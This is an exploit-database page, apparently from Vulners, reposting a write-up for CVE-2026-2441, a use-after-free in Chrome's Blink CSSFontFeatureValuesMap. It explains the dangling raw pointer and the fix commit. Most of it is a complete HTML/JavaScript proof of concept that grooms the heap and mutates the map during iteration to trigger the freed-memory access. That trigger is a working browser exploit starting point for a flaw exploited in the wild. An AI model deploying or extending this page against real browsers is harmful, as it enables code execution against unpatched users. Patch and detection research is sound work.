Vulners
Lucene search
📄 Google Chrome CSSFontFeatureValuesMap Use-After-Free
| Reporter | Title | Published | Views | Family All 176 |
|---|---|---|---|---|
 | Exploit for Use After Free in Google Chrome | 20 Feb 202615:15 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 1 Mar 202618:34 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 24 Feb 202617:25 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 18 Feb 202611:46 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 3 Mar 202614:19 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 18 Feb 202621:27 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 19 Feb 202623:48 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 20 Feb 202615:24 | – | githubexploit |
| Exploit for Use After Free in Google Chrome | 20 Feb 202622:50 | – | githubexploit |
 | chromium -- security fix | 13 Feb 202600:00 | – | freebsd |
10
# Exploit Title: Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap
Use-After-Free
# Date: 2026-02-23
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.google.com/chrome/
# Software Link: https://www.google.com/chrome/
# Version: Chrome <= 144.x | Chrome < 145.0.7632.75
# Tested on: Windows 11 / Linux / macOS
# CVE: CVE-2026-2441
# Exploit Repository:
https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-2441
## Description
A use-after-free vulnerability exists in Google Chrome's CSS engine (Blink)
within the CSSFontFeatureValuesMap implementation. When an iterator is
created over a CSSFontFeatureValuesMap object and the underlying HashMap is
mutated during iteration, a rehash operation occurs, freeing the original
memory while the iterator still holds a raw pointer to it. This leads to a
use-after-free condition that can be exploited to execute arbitrary code
inside the Chrome sandbox.
The vulnerability was actively exploited in the wild as a zero-day before
the patch was released.
## Vulnerable Versions
- Google Chrome <= 144.x
- Google Chrome < 145.0.7632.75
- Microsoft Edge (prior to Chromium 145 update)
- Opera (prior to 127.0.5778.64)
- Any Chromium-based browser using affected Blink versions
## Technical Details
**Root Cause:** In
`third_party/blink/renderer/core/css/css_font_feature_values_map.cc`, the
`FontFeatureValuesMapIterationSource` holds a raw pointer (`const
FontFeatureAliases* aliases_`) to the internal HashMap. When the map is
mutated via `set()` or `delete()` during iteration, the HashMap rehashes,
the old storage is freed, and the pointer becomes dangling.
**Fix:** Commit `63f3cb4864c64c677cd60c76c8cb49d37d08319c` replaces the raw
pointer with a deep copy (`const FontFeatureAliases aliases_`).
## CVSS Score
**8.8 (High)** - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
## Proof of Concept
```html
<!DOCTYPE html>
<!--
CVE-2026-2441 - CSSFontFeatureValuesMap UAF
Author: nu11secur1ty
Date: 2026-02-23
Repository:
-->
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="author" content="nu11secur1ty">
<title>CVE-2026-2441 PoC - nu11secur1ty</title>
<style id="target-style">
@font-feature-values Target {
@styleset {
a:1; b:2; c:3; d:4; e:5; f:6; g:7; h:8;
i:9; j:10; k:11; l:12; m:13; n:14; o:15;
}
}
</style>
<style id="groom-style"></style>
</head>
<body>
<h2>CVE-2026-2441 Proof of Concept</h2>
<p>Author: nu11secur1ty</p>
<p>Check browser console for output. If browser crashes -> VULNERABLE</p>
<script>
// =================================================================
// CVE-2026-2441 Use-After-Free Exploit
// Author: nu11secur1ty
// =================================================================
console.log("==========================================");
console.log("CVE-2026-2441 PoC - nu11secur1ty");
console.log("==========================================");
// Heap grooming - create stable heap state
function groomHeap(count) {
let style = document.getElementById('groom-style');
if (!style || !style.sheet) return [];
// Clear existing
while (style.sheet.cssRules.length) {
try { style.sheet.deleteRule(0); } catch(e) {}
}
// Create groom objects
for (let i = 0; i < count; i++) {
try {
style.sheet.insertRule(
`@font-feature-values Groom${i} { @styleset { v${i}: ${i}; } }`,
style.sheet.cssRules.length
);
} catch(e) {}
}
console.log("[+] Heap groomed with " + count + " objects");
return Array(count);
}
// Main exploit logic
try {
// Phase 1: Prepare heap
groomHeap(64);
// Phase 2: Get target map
let sheet = document.getElementById('target-style').sheet;
if (!sheet || !sheet.cssRules.length) {
throw new Error("Target CSS rule not found");
}
let rule = sheet.cssRules[0];
let map = rule.styleset;
console.log("[+] CSSFontFeatureValuesMap size: " + map.size);
// Phase 3: Create iterator - RAW POINTER CAPTURED HERE
console.log("[*] Creating iterator (raw pointer captured)");
let iterator = map.entries();
let step = 0;
let iterations = 0;
// Phase 4: Trigger UAF through mutation + rehash
console.log("[*] Triggering rehash + UAF...");
while (step < 10) {
let result = iterator.next();
if (result.done) break;
let [key, value] = result.value;
iterations++;
console.log(" [step " + step + "] Read: " + key + " = " + value);
// MUTATION: delete current key
map.delete(key);
// MUTATION: massive insert to force rehash
for (let i = 0; i < 512; i++) {
map.set("spray_" + step + "_" + i, [i, i+1, i+2]);
}
step++;
}
console.log("[*] Completed " + iterations + " iterations");
// Phase 5: Final check
console.log("[*] Exploit execution complete");
console.log("[*] If browser crashed: VULNERABLE");
console.log("[*] If page survived: PATCHED");
console.log("==========================================");
console.log("CVE-2026-2441 - nu11secur1ty");
console.log("Repository:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-2441");
console.log("==========================================");
} catch (e) {
console.log("[!] EXCEPTION: " + e.message);
console.log("[!] This indicates UAF was triggered");
console.log("[!] CVE-2026-2441 - nu11secur1ty");
}
// Force layout recalc as additional trigger
void document.body.offsetWidth;
</script>
<!-- Alternative for...of trigger -->
<script>
try {
let altStyle = document.createElement('style');
document.head.appendChild(altStyle);
altStyle.sheet.insertRule(
'@font-feature-values Alt{@styleset{x:1; y:2; z:3;}}', 0
);
let altMap = altStyle.sheet.cssRules[0].styleset;
for (let [k, v] of altMap) {
altMap.delete(k);
for (let i = 0; i < 256; i++) {
altMap.set("alt_" + i, [i]);
}
break;
}
} catch(e) {
console.log("[!] Alternative trigger exception: " + e.message);
}
</script>
</body>
</html>
# Demo:
[href](https://www.patreon.com/posts/cve-2026-2441-151454779)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Feb 2026 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.18.8
EPSS0.23127
SSVC